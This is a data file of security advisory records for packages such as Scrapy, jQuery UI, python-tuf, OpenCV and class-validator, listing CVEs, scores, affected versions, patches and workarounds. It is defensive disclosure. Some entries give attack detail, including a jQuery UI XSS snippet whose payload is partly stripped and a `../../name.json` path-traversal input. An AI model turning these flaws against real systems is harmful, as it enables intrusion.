+This includes requests generated by Scrapy components, such as `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`, or as requests reached through redirects.
+
+### Patches
+
+Upgrade to Scrapy 2.5.1 and use the new `http_auth_domain` spider attribute to control which domains are allowed to receive the configured HTTP authentication credentials.
+
+If you are using Scrapy 1.8 or a lower version, and upgrading to Scrapy 2.5.1 is not an option, you may upgrade to Scrapy 1.8.1 instead.
+
+### Workarounds
+
+If you cannot upgrade, set your HTTP authentication credentials on a per-request basis, using for example the [`w3lib.http.basic_auth_header`](https://w3lib.readthedocs.io/en/latest/w3lib.html#w3lib.http.basic_auth_header) function to convert your credentials into a value that you can assign to the `Authorization` header of your request, instead of defining your credentials globally using [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth).
+
+### For more information
+If you have any questions or comments about this advisory:
+* [Open an issue](https://github.com/scrapy/scrapy/issues)
+* [Email us](mailto:opensource@zyte.com)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Scrapy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Scrapy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/scrapy/scrapy/security/advisories/GHSA-jwqp-28gf-p498'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41125'}, {'type': 'WEB', 'url': 'https://github.com/scrapy/scrapy/commit/b01d69a1bf48060daec8f751368622352d8b85a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/scrapy/scrapy'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/03/msg00021.html'}, {'type': 'WEB', 'url': 'https://w3lib.readthedocs.io/en/latest/w3lib.html#w3lib.http.basic_auth_header'}, {'type': 'WEB', 'url': 'http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth'}]","{'cwe_ids': ['CWE-200', 'CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:32:00Z', 'nvd_published_at': '2021-10-06T18:15:00Z'}"
+1.4.0,GHSA-q6j2-g8qf-wvf7,2022-06-29T21:54:06Z,2021-10-12T22:34:28Z,,['CVE-2020-19003'],Verification check bypass in Gate One,An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'gateone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-19003'}, {'type': 'WEB', 'url': 'https://github.com/liftoff/GateOne/issues/728'}, {'type': 'PACKAGE', 'url': 'https://github.com/liftoff/GateOne'}]","{'cwe_ids': ['CWE-290'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T13:57:49Z', 'nvd_published_at': '2021-10-06T13:15:00Z'}"
+1.4.0,GHSA-q854-j362-cfq9,2021-10-08T21:54:35Z,2021-10-12T16:22:30Z,,['CVE-2020-23849'],Cross-site Scripting in jsoneditor,Stored XSS was discovered in the tree mode of jsoneditor before 9.0.2 through injecting and executing JavaScript.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsoneditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23849'}, {'type': 'WEB', 'url': 'https://github.com/josdejong/jsoneditor/issues/1029'}, {'type': 'PACKAGE', 'url': 'https://github.com/josdejong/jsoneditor'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:54:35Z', 'nvd_published_at': '2021-01-11T14:15:00Z'}"
+1.4.0,GHSA-rqgp-ccph-5w65,2021-11-02T18:42:29Z,2021-10-28T23:14:14Z,,['CVE-2021-3901'],Cross-Site Request Forgery in firefly-iii,firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3901'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/b42d8d1e305cad70d9b83b33cd8e0d7a4b2060c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/62508fdc-c26b-4312-bf75-fd3a3f997464'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T21:12:18Z', 'nvd_published_at': '2021-10-27T21:15:00Z'}"
+1.4.0,GHSA-gpqq-952q-5327,2022-10-04T21:36:19Z,2021-10-26T14:55:12Z,,['CVE-2021-41184'],XSS in the `of` option of the `.position()` util in jquery-ui,"### Impact
+Accepting the value of the `of` option of the [`.position()`](https://api.jqueryui.com/position/) util from untrusted sources may execute untrusted code. For example, invoking the following code:
+```js
+$( ""#element"" ).position( {
+ my: ""left top"",
+ at: ""right bottom"",
+ of: ""
"",
+ collision: ""none""
+} );
+```
+will call the `doEvilThing()` function.
+
+### Patches
+The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector.
+
+### Workarounds
+A workaround is to not accept the value of the `of` option from untrusted sources.
+
+### For more information
+If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery.UI.Combined'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-ui-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/security/advisories/GHSA-gpqq-952q-5327'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41184'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/commit/effa323f1505f2ce7a324e4f429fa9032c72f280'}, {'type': 'WEB', 'url': 'https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-ui'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211118-0004/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-001'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T22:06:43Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}"
+1.4.0,GHSA-7c7g-72q7-4xhm,2021-10-08T22:15:48Z,2021-10-12T16:27:35Z,,['CVE-2020-28274'],Prototype pollution vulnerability in 'deepref',Prototype pollution vulnerability in 'deepref' versions 1.1.1 through 1.2.1 allows attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'deepref'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'last_affected': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28274'}, {'type': 'PACKAGE', 'url': 'https://github.com/isaymatato/deepref'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28274,https://github.com/isaymatato/deepref/commit/24935e6a1060cb09c641d3075982f0b44cfca4c2'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:15:48Z', 'nvd_published_at': '2020-12-08T22:15:00Z'}"
+1.4.0,GHSA-wjw6-2cqr-j4qr,2021-10-19T18:03:49Z,2021-10-19T20:14:36Z,,['CVE-2021-41131'],Client metadata path-traversal,"### Impact
+In both clients (`tuf/client` and `tuf/ngclient`), there is a path traversal vulnerability that in the worst case can overwrite files ending in `.json` anywhere on the client system on a call to `get_one_valid_targetinfo()`. It occurs because the rolename is used to form the filename, and may contain path traversal characters (ie `../../name.json`).
+
+The impact is mitigated by a few facts:
+* It only affects implementations that allow arbitrary rolename selection for delegated targets metadata
+* The attack requires the ability to A) insert new metadata for the path-traversing role and B) get the role delegated by an existing targets metadata
+* The written file content is heavily restricted since it needs to be a valid, signed targets file. The file extension is always .json.
+
+### Patches
+A fix is available in version 0.19 or newer.
+
+### Workarounds
+None that do not require code changes. Clients can restrict the allowed character set for rolenames, or they can store metadata in files named in a way that is not vulnerable: neither of these approaches is possible without modifying python-tuf.
+
+### References
+- [The issue where this was discovered](https://github.com/theupdateframework/python-tuf/issues/1527)
+- [Proof of Concept demonstrating the flaw](https://github.com/jku/path-traversal-poc)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [python-tuf](https://github.com/theupdateframework/python-tuf/issues)
+* Contact the maintainers by email or Slack
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41131'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/issues/1527'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102'}, {'type': 'PACKAGE', 'url': 'https://github.com/theupdateframework/python-tuf'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T16:09:34Z', 'nvd_published_at': '2021-10-19T18:15:00Z'}"
+1.4.0,GHSA-97x5-cc53-cv4v,2021-10-28T17:21:21Z,2021-10-28T23:14:06Z,,['CVE-2020-22864'],Cross site scripting in froala-editor,A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor allows attackers to execute arbitrary web scripts or HTML.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'froala-editor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-22864'}, {'type': 'WEB', 'url': 'https://github.com/froala/wysiwyg-editor/issues/3880'}, {'type': 'WEB', 'url': 'https://github.com/418sec/wysiwyg-editor/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/froala/wysiwyg-editor/pull/3911'}, {'type': 'PACKAGE', 'url': 'https://github.com/froala/wysiwyg-editor'}, {'type': 'WEB', 'url': 'https://github.com/froala/wysiwyg-editor/releases/tag/v4.0.11'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=WE3b1iSnWJY'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T17:21:21Z', 'nvd_published_at': '2021-10-26T22:15:00Z'}"
+1.4.0,GHSA-89rj-5ggj-3p9p,2021-11-18T15:29:39Z,2021-10-12T22:03:41Z,,['CVE-2018-5269'],Reachable Assertion in OpenCV.,"In OpenCV 3.3.1 (corresponds with OpenCV-Python 3.3.1.11), an assertion failure happens in cv::RBaseStream::setPos in modules/imgcodecs/src/bitstrm.cpp because of an incorrect integer cast.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-5269'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10540'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10563'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/04/msg00019.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106945'}]","{'cwe_ids': ['CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T19:49:56Z', 'nvd_published_at': '2018-01-08T05:29:00Z'}"
+1.4.0,GHSA-c3xq-cj8f-7829,2023-02-13T17:02:33Z,2021-10-12T16:31:43Z,,['CVE-2013-2166'],Inadequate Encryption Strength in python-keystoneclient,python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache encryption bypass.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'python-keystoneclient'}, 'ecosystem_specific': {'affected_functions': ['keystoneclient.middleware.auth_token.AuthProtocol._protect_cache_value', 'keystoneclient.middleware.auth_token.AuthProtocol._unprotect_cache_value', 'keystoneclient.middleware.auth_token.AuthProtocol._get_cache_key', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_get', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_store', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_put', 'keystoneclient.middleware.memcache_crypt.generate_aes_key', 'keystoneclient.middleware.memcache_crypt.compute_mac', 'keystoneclient.middleware.memcache_crypt.hash_data', 'keystoneclient.middleware.memcache_crypt.sign_data', 'keystoneclient.middleware.memcache_crypt.verify_signed_data', 'keystoneclient.middleware.memcache_crypt.encrypt_data', 'keystoneclient.middleware.memcache_crypt.decrypt_data']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.3'}, {'fixed': '0.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-2166'}, {'type': 'WEB', 'url': 'https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2013-2166'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2166'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-2166'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/python-keystoneclient'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2013-2166'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2013-0992.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/06/19/5'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/60684'}]","{'cwe_ids': ['CWE-326'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:03:40Z', 'nvd_published_at': '2019-12-10T15:15:00Z'}"
+1.4.0,GHSA-83rh-hx5x-q9p5,2021-10-07T20:17:07Z,2021-10-12T22:03:23Z,,['CVE-2017-18009'],Out-of-bounds Read in OpenCV,"In OpenCV 3.3.1 (corresponding with OpenCV-Python 3.3.1.11), a heap-based buffer over-read exists in the function cv::HdrDecoder::checkSignature in modules/imgcodecs/src/grfmt_hdr.cpp.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18009'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10479'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10480/commits/4ca89db22dea962690f31c1781bce5937ee91837'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106945'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:17:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h9ph-jcgh-gf69,2021-10-19T14:51:30Z,2021-10-12T16:40:28Z,,['CVE-2021-42112'],Cross-site Scripting in Limesurvey,"The ""File upload question"" functionality in LimeSurvey 3.x-LTS through 3.27.18 allows XSS in assets/scripts/modaldialog.js and assets/scripts/uploader.js.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'limesurvey/limesurvey'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.27.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42112'}, {'type': 'WEB', 'url': 'https://github.com/LimeSurvey/LimeSurvey/pull/2044'}, {'type': 'WEB', 'url': 'https://github.com/LimeSurvey/LimeSurvey/commit/d56619a50cfd191bbffd0adb660638a5e438070d'}, {'type': 'WEB', 'url': 'https://bugs.limesurvey.org/view.php?id=17562'}, {'type': 'PACKAGE', 'url': 'https://github.com/LimeSurvey/LimeSurvey'}, {'type': 'WEB', 'url': 'https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_limesurvey_-_cve-2021-42112.pdf'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T20:21:13Z', 'nvd_published_at': '2021-10-08T21:15:00Z'}"
+1.4.0,GHSA-cr3f-r24j-3chw,2023-08-08T19:59:06Z,2021-10-05T17:53:29Z,,['CVE-2021-40325'],Cobbler before 3.3.0 allows authorization bypass for modification of settings.,Cobbler before 3.3.0 allows authorization bypass for modification of settings.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cobbler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40325'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a'}, {'type': 'PACKAGE', 'url': 'https://github.com/cobbler/cobbler'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/releases/tag/v3.3.0'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T16:00:07Z', 'nvd_published_at': '2021-10-04T06:15:00Z'}"
+1.4.0,GHSA-fj58-h2fr-3pp2,2023-01-11T21:59:18Z,2021-10-12T16:35:45Z,,['CVE-2019-18413'],SQL Injection and Cross-site Scripting in class-validator,"In TypeStack class-validator, `validate()` input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional `forbidUnknownValues` parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input.
+
+The default settings for `forbidUnknownValues` has been changed to `true` in 0.14.0.
+
+NOTE: a software maintainer agrees with the ""is not documented"" finding but suggests that much of the responsibility for the risk lies in a different product.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'class-validator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-18413'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/issues/1422#issuecomment-1344635415'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/issues/438'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/issues/438#issuecomment-964728471'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/pull/1798'}, {'type': 'PACKAGE', 'url': 'https://github.com/typestack/class-validator'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator#passing-options'}]","{'cwe_ids': ['CWE-79', 'CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:11:08Z', 'nvd_published_at': '2019-10-24T18:15:00Z'}"
+1.4.0,GHSA-wc73-w5r9-x9pc,2021-10-08T22:07:01Z,2021-10-12T16:41:36Z,,['CVE-2020-29204'],Cross-site Scripting in XXL-JOB,XXL-JOB 2.2.0 allows Stored XSS (in Add User) to bypass the 20-character limit via xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-job-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29204'}, {'type': 'WEB', 'url': 'https://github.com/xuxueli/xxl-job/issues/2083'}, {'type': 'WEB', 'url': 'https://github.com/xuxueli/xxl-job/commit/227628567354d3c156951009d683c6fec3006e0e'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-job'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:07:01Z', 'nvd_published_at': '2020-12-27T06:15:00Z'}"
+1.4.0,GHSA-jvjp-vh27-r9h5,2021-10-27T17:07:08Z,2021-10-27T18:53:03Z,,['CVE-2021-25977'],Cross-site Scripting in PiranhaCMS,"In PiranhaCMS, versions 7.0.0 to 9.1.1 are vulnerable to stored XSS due to the page title improperly sanitized. By creating a page with a specially crafted page title, a low privileged user can trigger arbitrary JavaScript execution. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Piranha'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '9.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25977'}, {'type': 'WEB', 'url': 'https://github.com/PiranhaCMS/piranha.core/commit/543bc53c7dbd28c793ec960b57fb0e716c6b18d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/PiranhaCMS/piranha.core'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25977'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:55:07Z', 'nvd_published_at': '2021-10-25T13:15:00Z'}"
